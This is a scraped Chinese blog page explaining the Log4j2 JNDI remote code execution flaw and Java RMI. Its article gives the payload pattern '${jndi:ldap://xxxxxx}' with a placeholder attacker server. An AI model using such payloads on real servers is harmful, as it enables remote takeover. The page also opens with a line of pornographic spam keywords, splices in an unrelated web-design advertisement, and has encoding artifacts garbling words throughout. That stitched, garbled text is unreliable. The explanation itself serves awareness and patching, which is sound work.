日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Apache 存在 Log4j2 遠(yuǎn)程代碼執(zhí)行漏洞,有哪些信息值得關(guān)注?

相信大家最近都被 Apache 的 Log4j2 的漏洞相關(guān)的文章刷屏了,不得不說這次的這個漏洞影響范圍之廣,很多互聯(lián)網(wǎng)大廠和開源軟件都被影響到了,作為一個特別通用的日志框架,日常使用的場景非常多,而且很多開源軟件都在使用,所以此次影響到一大批公司,堪稱核彈級漏洞!

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供渠縣網(wǎng)站建設(shè)、渠縣做網(wǎng)站、渠縣網(wǎng)站設(shè)計、渠縣網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計與制作、渠縣企業(yè)網(wǎng)站模板建站服務(wù),十余年渠縣做網(wǎng)站經(jīng)驗,不只是建網(wǎng)站,更提供有價值的思路和整體網(wǎng)絡(luò)服務(wù)。

不過據(jù)說 2021 年 11 月 24 日,阿里云安全團(tuán)隊向 Apache 官方報告了 Apache Log4j2 遠(yuǎn)程代碼執(zhí)行漏洞,可能這是為什么阿里內(nèi)部群很安靜,沒任何波瀾的原因吧,畢竟有安全部門!但是很多其他公司是工程師就很不幸了,都表示自己在 12 月 10 號這天晚上被拉起來修復(fù)漏洞了,還有好多要給客戶打補(bǔ)丁的。

漏洞描述

我們都知道在使用Apache Log4j2 記錄日志的時候,會使用這樣的格式logger.info("params: {}", params);,進(jìn)行組裝,不要告訴阿粉你是用加號拼裝~。log4j2 底層在進(jìn)行組裝的時候,如果發(fā)現(xiàn)傳入的 params 當(dāng)中含有${} 字符串的話會進(jìn)行替換的時候會執(zhí)行 lookup 的操作,所謂的 lookup 的操作就是允許通過 JNDI檢索變量。

通過 JNDI 注入漏洞,黑客可以惡意構(gòu)造特殊數(shù)據(jù)請求包,觸發(fā)此漏洞,從而成功利用此漏洞可以在目標(biāo)服務(wù)器上執(zhí)行任意代碼,想想就很恐怖!也就是說當(dāng) params 中的參數(shù)包含一些特定的字符的時候,就會觸發(fā)這個漏洞,這種字符數(shù)格式比如:${jndi:ldap://xxxxxx},${jndi:rmi://xxxxxx} 其中xxxxxx 表示黑客的服務(wù)地址。

黑客通過構(gòu)造這樣的字符串來訪問目標(biāo)網(wǎng)站,只要程序通過 log4j2 將日志進(jìn)行記錄,不管是什么級別,就會將 log4j2 的 lookup 功能觸發(fā),然后就會通過 RMI 訪問黑客的服務(wù)地址,黑客通過這個服務(wù)輸出一個 class 字節(jié)碼文件,這個字節(jié)碼文件里面可以執(zhí)行任何內(nèi)容,相當(dāng)于把這個服務(wù)器都交給黑客了,后果可想而知!

攻擊原理

有大佬畫了一張攻擊原理的圖書,阿粉給大家看一下,很詳細(xì)了。

相關(guān)實現(xiàn)的代碼阿粉放到了后臺,回復(fù)關(guān)鍵字【log4j】獲取,不過復(fù)現(xiàn)的過程可能會比較坎坷,因為由于 JDK 版本的問題,很多小伙伴不一定能復(fù)現(xiàn)出來。

RMI

估計很多小伙伴看到這個漏洞的時候估計跟阿粉一樣有一個疑問,那就是 RMI 是啥?運(yùn)用面向搜索引擎編程的技巧,阿粉找到了下面的內(nèi)容,看上去還是很好理解的。

Java RMI(Java Remote Method Invocation),即 Java 遠(yuǎn)程方法調(diào)用。是 Java 編程語言里,一種用于實現(xiàn)遠(yuǎn)程過程調(diào)用的應(yīng)用程序編程接口。有點(diǎn)類似于我們常用的服務(wù)注冊發(fā)現(xiàn)機(jī)制一樣,使用 JRMP(Java Remote Message Protocol,Java遠(yuǎn)程消息交換協(xié)議)實現(xiàn),使得客戶端運(yùn)行的程序可以調(diào)用遠(yuǎn)程服務(wù)器上的對象,有點(diǎn) RPC 的感覺。

劃重點(diǎn)

王堅博士曾說:安全是互聯(lián)網(wǎng)公司的生命,也是每一位網(wǎng)民的最基本需求。

互聯(lián)網(wǎng)軟件的安全與我們每一個程序員相關(guān),我們在日常工作中要隨時有應(yīng)對各種安全漏洞的準(zhǔn)備,寫的代碼也有盡量沒有漏洞。為此阿粉特意找來了一本由阿里知名白帽子道哥編寫的《白帽子講 Web 安全》書籍,里面分析了很多種 Web 安全,如下面所示,讓我們?yōu)榛ヂ?lián)網(wǎng)的安全做一點(diǎn)小小的貢獻(xiàn)。


分享名稱:Apache 存在 Log4j2 遠(yuǎn)程代碼執(zhí)行漏洞,有哪些信息值得關(guān)注?
文章網(wǎng)址:http://m.5511xx.com/article/dphisdo.html